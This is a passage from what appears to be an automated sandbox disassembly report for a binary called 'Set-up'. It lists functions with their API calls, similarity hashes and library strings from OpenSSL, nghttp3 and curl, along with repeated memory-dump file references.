                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: strlen$_errno
                          • String ID: .cnf$.conf$crypto/conf/conf_def.c
                          • API String ID: 3066963124-3060939390
                          • Opcode ID: 5124928b079fc037a8a9e8258555d00bd1fbadaafa7a23826432e80f417481c7
                          • Instruction ID: 8fb0c05a11e6e61b811eddc70c111df8a5b3b25dda820766240bcaa376efdc49
                          • Opcode Fuzzy Hash: 5124928b079fc037a8a9e8258555d00bd1fbadaafa7a23826432e80f417481c7
                          • Instruction Fuzzy Hash: C321E6E2E0524167DA107679AC43F2B369C9F57344F080938F8899A2C2F7A5DD14D2B3
                          APIs
                          • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,00000000,00000000,00000000,00000100,?,00C3F556,00000000,FFFFFFFF,00000000,?,00000000,00C406DF,?), ref: 00BF08D7
                          • memset.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?,?,00000000,00BB973B), ref: 00BF0977
                            • Part of subcall function 00C17220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C17262
                            • Part of subcall function 00C17220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C17285
                            • Part of subcall function 00C17220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C172C5
                            • Part of subcall function 00C17220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C172E8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: memsetstrcpystrlen
                          • String ID: BUF_MEM_grow$crypto/buffer/buffer.c
                          • API String ID: 1298912638-2735992530
                          • Opcode ID: bb5ab7417586814fac859917c5a75a0a8ddf644c46f1c50d8a69fa3d17b56e33
                          • Instruction ID: 8612a27bafb6d2fb961d38e341d543f008db56ee7cf9b76dea5aae6699e821af
                          • Opcode Fuzzy Hash: bb5ab7417586814fac859917c5a75a0a8ddf644c46f1c50d8a69fa3d17b56e33
                          • Instruction Fuzzy Hash: 7A314771B142096BE710BA259C42F3AB3D9DB40714F148228FA58972D3E2B1EC5892E1
                          APIs
                            • Part of subcall function 00DE7850: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00DE66E9,?,?,?,?,?,?,?,?,?,?,?), ref: 00DE787B
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,UTF-8,00000001,?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 00DE66F5
                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,010C720C,?,?,00000001,00000000,00000000,?,00000009,?), ref: 00DE6714
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 00DE6727
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00DE6776
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00DE67CC
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: _errno$strcmp
                          • String ID:
                          • API String ID: 3909137471-0
                          • Opcode ID: 03df512ed58e913564f516df7fad5b24168ee29e6aa02a4ce1e77046ea5682a3
                          • Instruction ID: 9322376186cb6a18fd838a50e9a408e2873aa0d565e153c931cefc9d5c42c37d
                          • Opcode Fuzzy Hash: 03df512ed58e913564f516df7fad5b24168ee29e6aa02a4ce1e77046ea5682a3
                          • Instruction Fuzzy Hash: 0231C3316002449FCB217FA6DC40A1A77E9EF693B8F580568F9989B211E731DD11CB71
                          APIs
                          • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,00C42704,00000008), ref: 00C4204D
                            • Part of subcall function 00C17220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C17262
                            • Part of subcall function 00C17220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C17285
                            • Part of subcall function 00C17220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C172C5
                            • Part of subcall function 00C17220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C172E8
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,?,00C42704,00000008), ref: 00C420C3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: strcpystrlen$memcpymemset
                          • String ID: copy_integer$crypto/params.c$general_set_int
                          • API String ID: 2323844366-2562949257
                          • Opcode ID: 1d7a784db10b0de914aad0fea263a4a24175fa01e95a97403b503751f5a26ffa
                          • Instruction ID: 04de5f0abab97da8e0336ccc5ae629f555d3d70cacf09b5d26c99cc3422bea54
                          • Opcode Fuzzy Hash: 1d7a784db10b0de914aad0fea263a4a24175fa01e95a97403b503751f5a26ffa
                          • Instruction Fuzzy Hash: 3C210D70B083046BD23066259C83F7BB7E5FB85704F640139F95D9B243E5A6ED45E261
                          APIs
                          • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,?,?,00C4299E,00000008), ref: 00C421A8
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,00C4299E,00000008), ref: 00C421FE
                            • Part of subcall function 00C440A0: memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,?,?,00C42075,?,?,?,?,?,?,00C42704,00000008), ref: 00C440C1
                            • Part of subcall function 00C440A0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,00C42075,?,?,?,?,?,?,00C42704,00000008), ref: 00C4411E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: memcpymemset
                          • String ID: copy_integer$crypto/params.c$general_get_uint
                          • API String ID: 1297977491-1187682564
                          • Opcode ID: 86f4847643517e4620b095165ac05124e67a1b0fef8b45e601809314e2c67877
                          • Instruction ID: 73132bb6860606dcd0541c853e3d386df29ea697eb6b14e9b34f29ac8c58e9c6
                          • Opcode Fuzzy Hash: 86f4847643517e4620b095165ac05124e67a1b0fef8b45e601809314e2c67877
                          • Instruction Fuzzy Hash: 22218C76B4420077D5303165BC43F6F6757EBC5B24F780139FB0DAA183E9A5AD8171A0
                          APIs
                          • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,?,?,?,00C42BF4,00000008), ref: 00C422C1
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,?,00C42BF4,00000008), ref: 00C42312
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: memcpymemset
                          • String ID: copy_integer$crypto/params.c$general_set_uint
                          • API String ID: 1297977491-3191580373
                          • Opcode ID: ede3b5456b6e9c3c1e4b868a1020f7bb6085a1f44467d58e82bd0bec4574b15e
                          • Instruction ID: 6723c8967b51ad6f85330fe961763f4e109a6765f95f0c01390c47c18e80ea9e
                          • Opcode Fuzzy Hash: ede3b5456b6e9c3c1e4b868a1020f7bb6085a1f44467d58e82bd0bec4574b15e
                          • Instruction Fuzzy Hash: 8A219B70B083002BDB30A925AC43F3A77ADFBD1714F64052DF4598A283E5E9AE801270
                          APIs
                          • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,?,?,00C42075,?,?,?,?,?,?,00C42704,00000008), ref: 00C440C1
                            • Part of subcall function 00C17220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C17262
                            • Part of subcall function 00C17220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C17285
                            • Part of subcall function 00C17220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C172C5
                            • Part of subcall function 00C17220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C172E8
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,00C42075,?,?,?,?,?,?,00C42704,00000008), ref: 00C4411E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: strcpystrlen$memcpymemset
                          • String ID: copy_integer$crypto/params.c$unsigned_from_signed
                          • API String ID: 2323844366-3781254518
                          • Opcode ID: b489be85f5c900206cde57b2e8f6edba944439cdeda1a934e7f76c8c0b1db895
                          • Instruction ID: 5240553305c29b947aa63cea70e2b05b7f489ce449def18597941f2fa616b3e8
                          • Opcode Fuzzy Hash: b489be85f5c900206cde57b2e8f6edba944439cdeda1a934e7f76c8c0b1db895
                          • Instruction Fuzzy Hash: 2C014CB1B4831076E2347265BC03F6F2769DFD6B14F380538F648AA1C3E5D9689562B2
                          APIs
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(00FBE17C,nghttp3_qpack.c,00000811,?,?), ref: 00B0E866
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(space <= ctx->max_dtable_capacity,nghttp3_qpack.c,0000080D,?,?,?,?,?,00B1077F,?,?,00000000,00000000), ref: 00B0E87B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: _assert
                          • String ID: nghttp3_qpack.c$space <= ctx->max_dtable_capacity
                          • API String ID: 1222420520-1270044496
                          • Opcode ID: 0356854b8add3aff261cc51717599c0d589c83c5021a951d74fb07658a4a8dd1
                          • Instruction ID: 9f39e183c2bd17a91d977cb5aa8fb1afc7c05edcd0fb9a6f172701ebb5a48206
                          • Opcode Fuzzy Hash: 0356854b8add3aff261cc51717599c0d589c83c5021a951d74fb07658a4a8dd1
                          • Instruction Fuzzy Hash: A881B6B5A007019FD710DF24D842A26BBF5FF59314F088A6CE88A87792EB31F955CB91
                          APIs
                          • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000002E), ref: 00B183AD
                          • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(HOSTALIASES), ref: 00B183C5
                            • Part of subcall function 00B277B0: fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00FC4C2D,00000000,00000000,?,?,?,00B29882,?,00000000), ref: 00B277DD
                            • Part of subcall function 00B277B0: fseek.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000000,00000002,?,00000000), ref: 00B277F0
                            • Part of subcall function 00B277B0: fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,00000000), ref: 00B27802
                          • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 00B1853F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: _stricmpfclosefopenfseekgetenvstrchr
                          • String ID: HOSTALIASES
                          • API String ID: 1675145106-255135673
                          • Opcode ID: 0cb452524c344afc1824acd4d058c3999b624cb05483efd04e268e8ff14ca2c2
                          • Instruction ID: 2ed38c04c7b98d4749ae4e4b64456a189478aa330ddece861556f9f233b69a98
                          • Opcode Fuzzy Hash: 0cb452524c344afc1824acd4d058c3999b624cb05483efd04e268e8ff14ca2c2
                          • Instruction Fuzzy Hash: 7951D4A1D0838297E720DB21AD417BB73D8AFA5348F40992CFD8C85252FF75D6D48B52
                          APIs
                          • _stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00A654E6), ref: 00A68235
                          • strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000002F), ref: 00A682D4
                          • strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000005C), ref: 00A682E1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: strrchr$_stat64
                          • String ID: mime.c
                          • API String ID: 2771713950-3378952128
                          • Opcode ID: 2113d4ce29c3df35f1b1d8aeccba374e35707cb88d8d12562b98512197855f03
                          • Instruction ID: 9532e5eaa7f7ea45ae2a03dab33f19b00f936909bec1c20a7c266969795085de
                          • Opcode Fuzzy Hash: 2113d4ce29c3df35f1b1d8aeccba374e35707cb88d8d12562b98512197855f03
                          • Instruction Fuzzy Hash: 0251A2B1A547009BEB109F24DD9676B3AB8AF40B14F040268FC589F3C6EBB9D9149792
                          APIs
                          • htons.WS2_32(?), ref: 00AA43D8
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00AA4409
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000020,?,00000001), ref: 00AA4457
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
